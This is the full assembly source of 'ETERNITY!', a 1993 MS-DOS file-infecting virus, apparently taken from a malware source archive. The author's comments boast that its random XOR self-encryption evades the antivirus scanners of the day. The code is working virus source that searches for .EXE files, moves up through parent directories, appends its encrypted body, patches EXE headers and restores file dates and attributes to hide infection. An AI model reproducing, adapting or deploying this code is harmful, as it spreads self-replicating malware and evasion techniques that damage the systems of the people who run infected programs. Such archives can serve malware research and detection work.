MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.eternity.asm

; VirusName : ETERNITY!
; Origin    : Sweden
; Author    : The Unforgiven
; Date      : 15/12/93

; This is a "mutation", of Tormentor's .EXE lession. It's HIGHLY
; modified, and I'd nearly dare to call it a "new" virus. But well,
; the infection routine are the same, so I really dunno. 

; Anyway, it's a non-overwriting randomly self encrypted infector
; of .EXE programs. It'll infect up to 3 programs each run, and now
; it also contain a dot-dot routine for moving directories. This
; version have also fixed up the "file attributes", so It will
; first clean, then infect, then restore them. It'll after infections
; in other the current directory, also return to it's original dir. 

; Since its complex cryptation routine no scanners will find it. 
; Scan/MSAV/TBAV/FindViru and F-prot can't find shits. TBAVs most
; advanced heurtistic scanner will ONLY!, report that the infected
; programs got a flexible entry point, ie nothing really! Haha!,
; he can suck his dick blue, 9 out of 10 "new" viruses, blah!!!

; This virus don't have ANY destructive routine at all!, Yes, it's
; true!	I hope this one will survive into ETERNITY!..Greetings,
; must go out to Raver, and Tormentor/DY. Hope you enjoy this code!

;=============================================================================
;		           **** ETERNITY! ****
;=============================================================================

		.model	tiny
		.radix	16
		.code

Virus_Lenght	EQU	Virus_End-Virus_Start	; Lenght of virus.
		org	100

Virus_Start:	call	where_we_are
				
where_we_are:   	pop	bp
	        	sub	bp,where_we_are-Virus_Start

		call encrypt_decrypt
		jmp encryption_start
write_virus:
	    call encrypt_decrypt
		mov	ah,40		; Write virus to EOF.
		mov	cx,Virus_Lenght
		mov	dx,bp
		int	21	
	    call encrypt_decrypt
		ret

encryption_value dw 0
encrypt_decrypt:
    lea si,cs:[bp+encryption_start-virus_start]
    mov cx,(end_of_virus-encryption_start+1)/2
    mov dx,word ptr cs:[bp+encryption_value-virus_start]

again:
    xor word ptr cs:[si],dx
    add si,2
    loop again
    ret


encryption_start:

		mov	ax,es
		add	ax,10
		add	ax,cs:[bp+Exe_header-Virus_Start+16]
		push	ax
		push	cs:[bp+Exe_header-Virus_Start+14]

		push	ds
		push	cs
		pop	ds	

		mov	ah,1a				;SET-DTA
		lea dx,[bp+Own_dta-virus_start]		;till own_dta
		int	21

;Get starting dir
   mov ah,47
    xor dl,dl
    lea si,[bp+dir-virus_start]
    int 21


;start finding files
		xor di,di	;infection count

		mov	ah,4e		; We start to look for a *.EXE file
look4victim:	;mov	dx,offset file_match-Virus_Start
		;add	dx,bp	
		lea dx,[bp+file_match-virus_start]
		int	21	

		jnc	clear_attribs

		lea dx,[bp+dot_dot-virus_start]
		mov ah,3bh
		int 21h
		jnc not_root
		jmp no_victim_found
not_root:
		mov ah,4e
		jmp look4victim
;		jmp	no_victim_found ; If no *.EXE files was found.

clear_attribs:	
    mov ax,4301h
    xor cx,cx
    lea dx,[bp+own_dta-virus_start+1eh]
    int 21h

cont2:		mov	ax,3d02			    ;open file
	      	mov	dx,Own_dta-Virus_Start+1e
	      	add	dx,bp	
	       	int	21	
	
		jnc	cont1			    ;exit if error
		jmp	cant_open_file

cont1:		xchg	ax,bx			;handle in bx
	
		mov	ah,3f		;read file - 28 bytes
		mov	cx,1c		;to EXE_header
		lea dx,[bp+exe_header-virus_start]
		int	21	
	
		jnc	no_error	;exit if error
		jmp	read_error
no_error:
		cmp	byte ptr ds:[bp+Exe_header-Virus_Start],'M'
		jnz	no_exe		; !!! Some EXEs starts with ZM !!!
		cmp	word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
		jz	infected

		mov	ax,4202		; Go EOF
		xor	cx,cx	
		xor	dx,dx	
		int	21	

		push	dx
		push	ax

    mov ah,2ch 				; this gets a random
    int 21h				; encryption value..
    mov word ptr cs:[bp+encryption_value-virus_start],dx   
							          
    call write_virus
;		mov	ah,40		; Write virus to EOF.
;		mov	cx,Virus_Lenght
;		mov	dx,bp	
;		int	21	

		mov	ax,4202		; Get NEW filelenght.
		xor	cx,cx
		xor	dx,dx
		int	21

		mov	cx,200
		div	cx
		inc	ax
		mov	word ptr ds:[Exe_header-Virus_Start+2+bp],dx
		mov	word ptr ds:[Exe_header-Virus_Start+4+bp],ax

		pop	ax
		pop	dx

		mov	cx,10
		div	cx
		sub	ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
		mov	word ptr ds:[Exe_header-Virus_Start+16+bp],ax
		mov	word ptr ds:[Exe_header-Virus_Start+14+bp],dx

		mov	word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'

		mov	ax,4200		; Position file-pointer to BOF
		xor	cx,cx	
		xor	dx,dx	
		int	21	

		mov	ah,40		; Write header
		mov	cx,1c
;		mov	dx,offset Exe_header-Virus_Start
;		add	dx,bp
		lea dx,[bp+exe_header-virus_start]
		int	21	
	
		jc	write_error

no_exe:
		jmp close_it   ;
infected:
		dec di
close_it:

;restore date
    lea si,[bp+own_dta-virus_start+16h]
    mov cx,word ptr [si]
    mov dx,word ptr [si+2]
    mov ax,5701h
    int 21h

    mov	ah,3e		;close file
    int	21
  

; file attrib
    mov ax,4301h
    xor ch,ch
    lea bx,[bp+own_dta-virus_start+15h]
    mov cl,[bx]
    lea dx,[bp+own_dta-virus_start+1eh]
    int 21h

Sick_or_EXE:	mov	ah,4f ;find next in dir until all is found
		inc di
		cmp di,3
		jae finnished_infection
		jmp	look4victim

write_error:		; Here you can test whats went wrong.
read_error:		; This is just for debugging purpose.
cant_open_file:		; These entries are equal to eachother
no_victim_found:	; but could be changed if you need to test something.
finnished_infection:

;restore dir
    lea dx,[bp+dir-virus_start]
    mov ah,03bh
    int 21

quit:
		pop	ds
		retf

note    	db "[ETERNITY!] (c) '93 The Unforgiven/Immortal Riot " 
dot_dot		db	'..',0			 
file_match	db	'*.EXE',0	; Files to infect.
Exe_header	db	16 DUP(0)
		dw	0fff0		; Just for this com file.
		db	4  DUP(0)
Own_Dta		db	02bh DUP(0)
dir		db 65 dup (?)

Virus_End	EQU	$
end_of_virus:
		end	Virus_Start